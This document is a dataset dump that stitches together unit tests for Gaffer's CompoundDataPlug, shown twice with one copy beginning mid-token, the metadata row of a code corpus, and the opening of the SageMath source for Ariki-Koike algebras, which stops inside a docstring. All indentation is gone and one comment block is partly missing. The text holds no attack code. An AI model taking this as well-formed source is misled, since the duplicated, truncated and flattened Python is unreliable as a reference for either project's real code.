m1["value"]["translate"].setValue( imath.V3f( 1,2,3 ) )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.M44fData( imath.M44f(
1, 0, 0, 0,
0, 1, 0, 0,
0, 0, 1, 0,
1, 2, 3, 1,
) ) )
self.assertEqual( n, "a" )
def testPlugFlags( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
p.addChild( m1 )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m1["name"].getFlags(), Gaffer.Plug.Flags.Default)
self.assertEqual( m1["value"].getFlags(), Gaffer.Plug.Flags.Default )
m2 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), True )
p.addChild( m2 )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["name"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["value"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["enabled"].getFlags(), Gaffer.Plug.Flags.Default )
def testCreateCounterpart( self ) :
p1 = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), "member1" )
p1.addChild( m1 )
p2 = p1.createCounterpart( "c", Gaffer.Plug.Direction.Out )
self.assertEqual( p2.typeName(), p1.typeName() )
self.assertEqual( p2.getName(), "c" )
self.assertEqual( p2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( len( p2 ), len( p1 ) )
self.assertEqual( p2.getFlags(), p1.getFlags() )
m2 = p2["member1"]
self.assertEqual( m2.typeName(), m1.typeName() )
self.assertEqual( m2.getFlags(), m1.getFlags() )
self.assertEqual( m2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( m2.keys(), m1.keys() )
def testCreateWithValuePlug( self ) :
p = Gaffer.CompoundDataPlug()
v = Gaffer.IntPlug( minValue = -10, maxValue = 10, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
m1 = Gaffer.NameValuePlug( "a", v )
p.addChild( m1 )
self.assertTrue( v.parent().isSame( m1 ) )
self.assertEqual( m1["value"].getName(), "value" )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.assertEqual( p.memberDataAndName( m1 ), ( IECore.IntData( 0 ), "a" ) )
v2 = Gaffer.IntPlug( defaultValue = 5, minValue = -10, maxValue = 10 )
m2 = Gaffer.NameValuePlug( "b", v2, True, name = "blah" )
p.addChild( m2 )
self.assertTrue( v2.parent().isSame( m2 ) )
self.assertEqual( m2["value"].getName(), "value" )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( p.memberDataAndName( m2 ), ( IECore.IntData( 5 ), "b" ) )
def testAdditionalChildrenRejected( self ) :
p = Gaffer.CompoundDataPlug()
self.assertRaises( RuntimeError, p.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, p.addChild, Gaffer.Plug() )
m = Gaffer.NameValuePlug( "a", IECore.IntData( 10 ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, m.addChild, Gaffer.StringPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "value" ) )
def testSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s["n"]["p"].addChild( Gaffer.NameValuePlug( "a", IECore.IntData( 10 ), "a", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual(
s["n"]["p"].memberDataAndName( s["n"]["p"]["a"] ),
s2["n"]["p"].memberDataAndName( s2["n"]["p"]["a"] ),
)
def testAddMembers( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
self.assertEqual( len( p ), 2 )
self.assertEqual( p[0].getName(), "member1" )
self.assertEqual( p[1].getName(), "member2" )
c = IECore.CompoundData()
p.fillCompoundData( c )
self.assertEqual( c, IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
def testAddMembersWithSpecificNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1 } ), useNameAsPlugName=True )
self.assertEqual( len( p ), 1 )
self.assertEqual( p[0].getName(), "one" )
o = IECore.CompoundObject()
p.fillCompoundObject( o )
self.assertEqual( o, IECore.CompoundObject( { "one" : IECore.IntData( 1 ) } ) )
def testAddMembersSerialisation( self ) :
d1 = IECore.CompoundData( { "one" : 1, "two" : 2 } )
s1 = Gaffer.ScriptNode()
s1["n"] = Gaffer.Node()
s1["n"]["user"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s1["n"]["user"]["p"].addMembers( d1 )
s2 = Gaffer.ScriptNode()
s2.execute( s1.serialise() )
d2 = IECore.CompoundData()
s2["n"]["user"]["p"].fillCompoundData( d2 )
self.assertEqual( d1, d2 )
def testBoxTypes( self ) :
p = Gaffer.CompoundDataPlug()
for name, value in [
( "b2f", IECore.Box2fData( imath.Box2f( imath.V2f( 0, 1 ), imath.V2f( 1, 2 ) ) ) ),
( "b2i", IECore.Box2iData( imath.Box2i( imath.V2i( -1, 10 ), imath.V2i( 11, 20 ) ) ) ),
( "b3f", IECore.Box3fData( imath.Box3f( imath.V3f( 0, 1, 2 ), imath.V3f( 3, 4, 5 ) ) ) ),
( "b3i", IECore.Box3iData( imath.Box3i( imath.V3i( 0, 1, 2 ), imath.V3i( 3, 4, 5 ) ) ) ),
] :
p.addChild( Gaffer.NameValuePlug( name, value ) )
self.assertEqual( p.memberDataAndName( p[-1] ), ( value, name ) )
def testBoxPromotion( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
s["b"]["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
p = Gaffer.PlugAlgo.promote( s["b"]["n"]["p"] )
p.setName( "p" )
def assertPreconditions( script ) :
self.assertEqual( script["b"]["n"]["p"].keys(), [] )
self.assertEqual( script["b"]["p"].keys(), [] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
def assertPostconditions( script ) :
self.assertEqual( script["b"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["n"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertEqual( script["b"]["n"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"].getInput().isSame( script["b"]["p"]["test"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["name"].getInput().isSame( script["b"]["p"]["test"]["name"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["value"].getInput().isSame( script["b"]["p"]["test"]["value"] ) )
assertPreconditions( s )
with Gaffer.UndoScope( s ) :
p.addChild(
Gaffer.NameValuePlug( "test", 10, "test",
Gaffer.Plug.Direction.In, Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic
)
)
assertPostconditions( s )
s.undo()
assertPreconditions( s )
s.redo()
assertPostconditions( s )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
assertPostconditions( s2 )
def testHashOmitsDisabledMembers( self ) :
p = Gaffer.CompoundDataPlug()
h1 = p.hash()
m1 = Gaffer.NameValuePlug( "test1", 10, False )
p.addChild( m1 )
m2 = Gaffer.NameValuePlug( "test2", 10, False )
p.addChild( m2 )
# even though we've added members, they're both
# disabled, so as far as the hash is concerned, they're
# not there.
h2 = p.hash()
self.assertEqual( h1, h2 )
# when we enable one, the hash should change.
m1["enabled"].setValue( True )
h3 = p.hash()
self.assertNotEqual( h2, h3 )
# and it should continue to change as we change the
# name and value for the enabled member.
m1["value"].setValue( 20 )
h4 = p.hash()
self.assertNotEqual( h3, h4 )
m1["name"].setValue( "test3" )
h5 = p.hash()
self.assertNotEqual( h4, h5 )
# but changing the name and value for the disabled
# member should have no effect at all.
m2["value"].setValue( 40 )
self.assertEqual( h5, p.hash() )
m2["name"].setValue( "test4" )
self.assertEqual( h5, p.hash() )
def testInternedStringVectorData( self ) :
d = IECore.InternedStringVectorData( [ "a", "b" ] )
p = Gaffer.CompoundDataPlug()
m = Gaffer.NameValuePlug( "test", d )
p.addChild( m )
self.assertTrue( isinstance( m["value"], Gaffer.InternedStringVectorDataPlug ) )
self.assertEqual( m["value"].defaultValue(), d )
self.assertEqual( m["value"].getValue(), d )
v, n = p.memberDataAndName( m )
self.assertEqual( v, d )
self.assertEqual( n, "test" )
def testNonAlphanumericNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers(
IECore.CompoundData( {
"test:A" : 10,
"@j" : 20
} ),
useNameAsPlugName = True,
)
self.assertEqual( set( p.keys() ), { "test_A", "_j" } )
self.assertEqual( p["test_A"]["value"].getValue(), 10 )
self.assertEqual( p["_j"]["value"].getValue(), 20 )
def testNonValuePlugs( self ) :
p = Gaffer.CompoundDataPlug()
p["test"] = Gaffer.NameValuePlug( "name", Gaffer.Plug() )
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.hash()
d = IECore.CompoundData()
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.fillCompoundData( d )
if __name__ == "__main__":
unittest.main()
| 34.432927
| 143
| 0.648309
|
nge(16) ) ) )
self.assertEqual( n, "a" )
def testTransformPlugData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", Gaffer.TransformPlug() )
p.addChild( m1 )
m1["value"]["translate"].setValue( imath.V3f( 1,2,3 ) )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.M44fData( imath.M44f(
1, 0, 0, 0,
0, 1, 0, 0,
0, 0, 1, 0,
1, 2, 3, 1,
) ) )
self.assertEqual( n, "a" )
def testPlugFlags( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
p.addChild( m1 )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m1["name"].getFlags(), Gaffer.Plug.Flags.Default)
self.assertEqual( m1["value"].getFlags(), Gaffer.Plug.Flags.Default )
m2 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), True )
p.addChild( m2 )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["name"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["value"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["enabled"].getFlags(), Gaffer.Plug.Flags.Default )
def testCreateCounterpart( self ) :
p1 = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), "member1" )
p1.addChild( m1 )
p2 = p1.createCounterpart( "c", Gaffer.Plug.Direction.Out )
self.assertEqual( p2.typeName(), p1.typeName() )
self.assertEqual( p2.getName(), "c" )
self.assertEqual( p2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( len( p2 ), len( p1 ) )
self.assertEqual( p2.getFlags(), p1.getFlags() )
m2 = p2["member1"]
self.assertEqual( m2.typeName(), m1.typeName() )
self.assertEqual( m2.getFlags(), m1.getFlags() )
self.assertEqual( m2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( m2.keys(), m1.keys() )
def testCreateWithValuePlug( self ) :
p = Gaffer.CompoundDataPlug()
v = Gaffer.IntPlug( minValue = -10, maxValue = 10, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
m1 = Gaffer.NameValuePlug( "a", v )
p.addChild( m1 )
self.assertTrue( v.parent().isSame( m1 ) )
self.assertEqual( m1["value"].getName(), "value" )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.assertEqual( p.memberDataAndName( m1 ), ( IECore.IntData( 0 ), "a" ) )
v2 = Gaffer.IntPlug( defaultValue = 5, minValue = -10, maxValue = 10 )
m2 = Gaffer.NameValuePlug( "b", v2, True, name = "blah" )
p.addChild( m2 )
self.assertTrue( v2.parent().isSame( m2 ) )
self.assertEqual( m2["value"].getName(), "value" )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( p.memberDataAndName( m2 ), ( IECore.IntData( 5 ), "b" ) )
def testAdditionalChildrenRejected( self ) :
p = Gaffer.CompoundDataPlug()
self.assertRaises( RuntimeError, p.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, p.addChild, Gaffer.Plug() )
m = Gaffer.NameValuePlug( "a", IECore.IntData( 10 ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, m.addChild, Gaffer.StringPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "value" ) )
def testSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s["n"]["p"].addChild( Gaffer.NameValuePlug( "a", IECore.IntData( 10 ), "a", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual(
s["n"]["p"].memberDataAndName( s["n"]["p"]["a"] ),
s2["n"]["p"].memberDataAndName( s2["n"]["p"]["a"] ),
)
def testAddMembers( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
self.assertEqual( len( p ), 2 )
self.assertEqual( p[0].getName(), "member1" )
self.assertEqual( p[1].getName(), "member2" )
c = IECore.CompoundData()
p.fillCompoundData( c )
self.assertEqual( c, IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
def testAddMembersWithSpecificNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1 } ), useNameAsPlugName=True )
self.assertEqual( len( p ), 1 )
self.assertEqual( p[0].getName(), "one" )
o = IECore.CompoundObject()
p.fillCompoundObject( o )
self.assertEqual( o, IECore.CompoundObject( { "one" : IECore.IntData( 1 ) } ) )
def testAddMembersSerialisation( self ) :
d1 = IECore.CompoundData( { "one" : 1, "two" : 2 } )
s1 = Gaffer.ScriptNode()
s1["n"] = Gaffer.Node()
s1["n"]["user"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s1["n"]["user"]["p"].addMembers( d1 )
s2 = Gaffer.ScriptNode()
s2.execute( s1.serialise() )
d2 = IECore.CompoundData()
s2["n"]["user"]["p"].fillCompoundData( d2 )
self.assertEqual( d1, d2 )
def testBoxTypes( self ) :
p = Gaffer.CompoundDataPlug()
for name, value in [
( "b2f", IECore.Box2fData( imath.Box2f( imath.V2f( 0, 1 ), imath.V2f( 1, 2 ) ) ) ),
( "b2i", IECore.Box2iData( imath.Box2i( imath.V2i( -1, 10 ), imath.V2i( 11, 20 ) ) ) ),
( "b3f", IECore.Box3fData( imath.Box3f( imath.V3f( 0, 1, 2 ), imath.V3f( 3, 4, 5 ) ) ) ),
( "b3i", IECore.Box3iData( imath.Box3i( imath.V3i( 0, 1, 2 ), imath.V3i( 3, 4, 5 ) ) ) ),
] :
p.addChild( Gaffer.NameValuePlug( name, value ) )
self.assertEqual( p.memberDataAndName( p[-1] ), ( value, name ) )
def testBoxPromotion( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
s["b"]["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
p = Gaffer.PlugAlgo.promote( s["b"]["n"]["p"] )
p.setName( "p" )
def assertPreconditions( script ) :
self.assertEqual( script["b"]["n"]["p"].keys(), [] )
self.assertEqual( script["b"]["p"].keys(), [] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
def assertPostconditions( script ) :
self.assertEqual( script["b"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["n"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertEqual( script["b"]["n"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"].getInput().isSame( script["b"]["p"]["test"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["name"].getInput().isSame( script["b"]["p"]["test"]["name"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["value"].getInput().isSame( script["b"]["p"]["test"]["value"] ) )
assertPreconditions( s )
with Gaffer.UndoScope( s ) :
p.addChild(
Gaffer.NameValuePlug( "test", 10, "test",
Gaffer.Plug.Direction.In, Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic
)
)
assertPostconditions( s )
s.undo()
assertPreconditions( s )
s.redo()
assertPostconditions( s )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
assertPostconditions( s2 )
def testHashOmitsDisabledMembers( self ) :
p = Gaffer.CompoundDataPlug()
h1 = p.hash()
m1 = Gaffer.NameValuePlug( "test1", 10, False )
p.addChild( m1 )
m2 = Gaffer.NameValuePlug( "test2", 10, False )
p.addChild( m2 )
# not there.
h2 = p.hash()
self.assertEqual( h1, h2 )
# when we enable one, the hash should change.
m1["enabled"].setValue( True )
h3 = p.hash()
self.assertNotEqual( h2, h3 )
# and it should continue to change as we change the
# name and value for the enabled member.
m1["value"].setValue( 20 )
h4 = p.hash()
self.assertNotEqual( h3, h4 )
m1["name"].setValue( "test3" )
h5 = p.hash()
self.assertNotEqual( h4, h5 )
# but changing the name and value for the disabled
# member should have no effect at all.
m2["value"].setValue( 40 )
self.assertEqual( h5, p.hash() )
m2["name"].setValue( "test4" )
self.assertEqual( h5, p.hash() )
def testInternedStringVectorData( self ) :
d = IECore.InternedStringVectorData( [ "a", "b" ] )
p = Gaffer.CompoundDataPlug()
m = Gaffer.NameValuePlug( "test", d )
p.addChild( m )
self.assertTrue( isinstance( m["value"], Gaffer.InternedStringVectorDataPlug ) )
self.assertEqual( m["value"].defaultValue(), d )
self.assertEqual( m["value"].getValue(), d )
v, n = p.memberDataAndName( m )
self.assertEqual( v, d )
self.assertEqual( n, "test" )
def testNonAlphanumericNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers(
IECore.CompoundData( {
"test:A" : 10,
"@j" : 20
} ),
useNameAsPlugName = True,
)
self.assertEqual( set( p.keys() ), { "test_A", "_j" } )
self.assertEqual( p["test_A"]["value"].getValue(), 10 )
self.assertEqual( p["_j"]["value"].getValue(), 20 )
def testNonValuePlugs( self ) :
p = Gaffer.CompoundDataPlug()
p["test"] = Gaffer.NameValuePlug( "name", Gaffer.Plug() )
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.hash()
d = IECore.CompoundData()
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.fillCompoundData( d )
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c4487923cc10926d95b12ba8c29699382d7d631
| 68540
|
py
|
Python
|
src/sage/algebras/hecke_algebras/ariki_koike_algebra.py
|
dcoudert/sage
|
c349c87d0dea805c92d589a259c4ed1a20407ca5
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/hecke_algebras/ariki_koike_algebra.py
|
dcoudert/sage
|
c349c87d0dea805c92d589a259c4ed1a20407ca5
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/hecke_algebras/ariki_koike_algebra.py
|
dcoudert/sage
|
c349c87d0dea805c92d589a259c4ed1a20407ca5
|
[
"BSL-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
Ariki-Koike Algebras
The *Ariki-Koike algebras* were introduced by Ariki and Koike [AK1994]_ as
a natural generalization of the Iwahori-Hecke algebras of types `A` and `B`
(see :class:`~sage.algebras.iwahori_hecke_algebra.IwahoriHeckeAlgebra`).
Soon afterwards, Broué and Malle defined analogues of the Hecke
algebras for all complex reflection groups.
Fix non-negative integers `r` and `n`. The Ariki-Koike algebras are
deformations of the group algebra of the complex reflection group
`G(r, 1, n) = \ZZ / r\ZZ \wr \mathfrak{S}_n`. If `R` is a ring containing a
*Hecke parameter* `q` and *cyclotomic parameters* `u_0, \ldots, u_{r-1}`, then
the Ariki-Koike algebra `H_n(q, u_0, \ldots, u_{r-1})` is the unital associative
`R`-algebra with generators `T_0, T_1, \ldots, T_{n-1}` and relations:
.. MATH::
\begin{aligned}
\prod_{i=0}^{r-1} (T_0 - u_i) & = 0, \\
T_i^2 & = (q - 1) T_i + q && \text{for } 1 \leq i < n, \\
T_0 T_1 T_0 T_1 & = T_1 T_0 T_1 T_0, \\
T_i T_j & = T_j T_i && \text{if } |i - j| \geq 2, \\
    T_i T_{i+1} T_i & = T_{i+1} T_i T_{i+1} && \text{for } 1 \leq i < n - 1.
\end{aligned}
AUTHORS:
- Travis Scrimshaw (2016-04): initial version
- Andrew Mathas (2016-07): improved multiplication code
REFERENCES:
- [AK1994]_
- [BM1993]_
- [MM1998]_
"""
#*****************************************************************************
# Copyright (C) 2016-2018 Travis Scrimshaw <tcscrims at gmail.com>
# 2016-2018 Andrew Mathas <andrew.mathas at sydney.edu.au>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.cachefunc import cached_method
from sage.misc.lazy_attribute import lazy_attribute
from sage.misc.misc_c import prod
from sage.misc.bindable_class import BindableClass
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.categories.algebras import Algebras
from sage.categories.rings import Rings
from sage.categories.realizations import Realizations, Category_realization_of_parent
from sage.categories.cartesian_product import cartesian_product
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.polynomial.laurent_polynomial_ring import LaurentPolynomialRing
from sage.rings.integer_ring import ZZ
from sage.combinat.free_module import CombinatorialFreeModule
from sage.combinat.permutation import Permutations
from sage.sets.family import Family
from sage.data_structures.blas_dict import iaxpy
# ABC for basis classes
class _Basis(CombinatorialFreeModule, BindableClass):
r"""
Abstract base class for bases of the Ariki-Koike algebra.
"""
def __init__(self, algebra, prefix='AK'):
r"""
Initialize ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(2, 3).LT()
sage: TestSuite(LT).run()
"""
self._r = algebra._r
self._n = algebra._n
self._q = algebra._q
self._u = algebra._u
# It seems more efficient to copy this as we need it a lot
self._zero_tuple = tuple([0] * self._n)
self._Pn = Permutations(self._n)
self._one_perm = self._Pn.one()
C = cartesian_product([range(self._r)] * self._n)
indices = cartesian_product([C, self._Pn])
CombinatorialFreeModule.__init__(self, algebra.base_ring(), indices,
prefix=prefix,
category=algebra._BasesCategory())
@cached_method
def one_basis(self):
r"""
Return the index of the basis element of `1`.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.one_basis()
((0, 0, 0), [1, 2, 3])
sage: T = algebras.ArikiKoike(5, 3).T()
sage: T.one_basis()
((0, 0, 0), [1, 2, 3])
"""
return (self._zero_tuple, self._one_perm)
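# Editor's note (sketch): basis elements are indexed by pairs ``(c, w)`` with
# ``c`` an ``n``-tuple over ``{0, ..., r-1}`` and ``w`` a permutation, matching
# the ``cartesian_product`` index set built in ``__init__`` above. Assuming a
# Sage session with this module available::
#
#     sage: LT = algebras.ArikiKoike(2, 2).LT()
#     sage: LT.monomial(((1, 0), Permutations(2)([2, 1])))
#     L1*T[1]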
class ArikiKoikeAlgebra(Parent, UniqueRepresentation):
r"""
The Ariki-Koike algebra `H_{r,n}(q, u)`.
Let `R` be a unital integral domain.
Let `q, u_0, \ldots, u_{r-1} \in R` such that `q^{-1} \in R`.
The *Ariki-Koike algebra* is the unital associative algebra
`H_{r,n}(q, u)` generated by `T_0, \ldots, T_{n-1}` that satisfies
the following relations:
.. MATH::
\begin{aligned}
\prod_{i=0}^{r-1} (T_0 - u_i) & = 0, \\
T_i^2 & = (q - 1) T_i + q && \text{for } 1 \leq i < n, \\
T_0 T_1 T_0 T_1 & = T_1 T_0 T_1 T_0, \\
T_i T_j & = T_j T_i && \text{if } |i - j| \geq 2, \\
    T_i T_{i+1} T_i & = T_{i+1} T_i T_{i+1} && \text{for } 1 \leq i < n - 1.
\end{aligned}
The parameter `q` is called the *Hecke parameter* and the parameters
`u_0, \ldots, u_{r-1}` are called the *cyclotomic parameters*.
Thus, the Ariki-Koike algebra is a deformation of the group algebra of the
complex reflection group `G(r, 1, n) = \ZZ / r\ZZ \wr \mathfrak{S}_n`.
Next, we define *Jucys-Murphy elements*
.. MATH::
L_i = q^{-i+1} T_{i-1} \cdots T_1 T_0 T_1 \cdots T_{i-1}
for `1 \leq i \leq n`.
.. NOTE::
These elements differ by a power of `q` from the corresponding
elements in [AK1994]_. However, these elements are more commonly
used because they lead to nicer representation theoretic formulas.
Ariki and Koike [AK1994]_ showed that `H_{r,n}(q, u)` is a free
`R`-module with a basis given by
.. MATH::
\{ L_1^{c_1} \cdots L_n^{c_n} T_w \mid w \in S_n, 0 \leq c_i < r \}.
In particular, we have `\dim H_{r,n}(q,u) = r^n n! = |G(r, 1, n)|`.
Moreover, we have `L_i L_j = L_j L_i` for all `1 \leq i, j \leq n`.
The Ariki-Koike algebra `H_{r,n}(q, u)` can be considered as a quotient
of the group algebra of the braid group for `G(r, 1, n)` by the ideal
generated by `\prod_{i=0}^{r-1} (T_0 - u_i)` and `(T_i - q)(T_i + 1)`.
Furthermore, `H_{r,n}(q, u)` can be constructed as a quotient of the
extended affine Hecke algebra of type `A_{n-1}^{(1)}` by
`\prod_{i=0}^{r-1} (X_1 - u_i)`.
Since the Ariki-Koike algebra is a quotient of the group
algebra of the braid group of `G(r, 1, n)`, we can recover
the group algebra of `G(r, 1, n)` as follows. Consider
`u = (1, \zeta_r, \ldots, \zeta_r^{r-1})`, where `\zeta_r`
is a primitive `r`-th root of unity, then we have
.. MATH::
R G(r, 1, n) = H_{r,n}(1, u).
INPUT:
- ``r`` -- the maximum power of `L_i`
- ``n`` -- the rank of `S_n`
- ``q`` -- (optional) an invertible element in a commutative ring;
the default is `q \in R[q,q^{-1}]`, where `R` is the ring containing
the variables ``u``
- ``u`` -- (optional) the variables `u_1, \ldots, u_r`; the
default is the generators of `\ZZ[u_1, \ldots, u_r]`
- ``R`` -- (optional) a commutative ring containing ``q`` and ``u``;
the default is the parent of `q` and `u_1, \ldots, u_r`
EXAMPLES:
We start by constructing an Ariki-Koike algebra where the
values `q, u` are generic and do some computations::
sage: H = algebras.ArikiKoike(3, 4)
Next, we do some computations using the `LT` basis::
sage: LT = H.LT()
sage: LT.inject_variables()
Defining L1, L2, L3, L4, T1, T2, T3
sage: T1 * T2 * T1 * T2
q*T[2,1] - (1-q)*T[2,1,2]
sage: T1 * L1 * T2 * L3 * T1 * T2
-(q-q^2)*L2*L3*T[2] + q*L1*L2*T[2,1] - (1-q)*L1*L2*T[2,1,2]
sage: L1^3
u0*u1*u2 + ((-u0*u1-u0*u2-u1*u2))*L1 + ((u0+u1+u2))*L1^2
sage: L3 * L2 * L1
L1*L2*L3
sage: u = LT.u()
sage: q = LT.q()
sage: (q + 2*u[0]) * (T1 * T2) * L3
(-2*u0+(2*u0-1)*q+q^2)*L3*T[1] + (-2*u0+(2*u0-1)*q+q^2)*L2*T[2]
+ (2*u0+q)*L1*T[1,2]
We check the defining relations::
sage: prod(L1 - val for val in u) == H.zero()
True
sage: L1 * T1 * L1 * T1 == T1 * L1 * T1 * L1
True
sage: T1 * T2 * T1 == T2 * T1 * T2
True
sage: T2 * T3 * T2 == T3 * T2 * T3
True
sage: L2 == q^-1 * T1 * L1 * T1
True
sage: L3 == q^-2 * T2 * T1 * L1 * T1 * T2
True
We construct an Ariki-Koike algebra with `u = (1, \zeta_3, \zeta_3^2)`,
where `\zeta_3` is a primitive third root of unity::
sage: F = CyclotomicField(3)
sage: zeta3 = F.gen()
sage: R.<q> = LaurentPolynomialRing(F)
sage: H = algebras.ArikiKoike(3, 4, q=q, u=[1, zeta3, zeta3^2], R=R)
sage: H.LT().inject_variables()
Defining L1, L2, L3, L4, T1, T2, T3
sage: L1^3
1
sage: L2^3
1 - (q^-1-1)*T[1] - (q^-1-1)*L1*L2^2*T[1] - (q^-1-1)*L1^2*L2*T[1]
Next, we additionally take `q = 1` to obtain the group algebra
of `G(r, 1, n)`::
sage: F = CyclotomicField(3)
sage: zeta3 = F.gen()
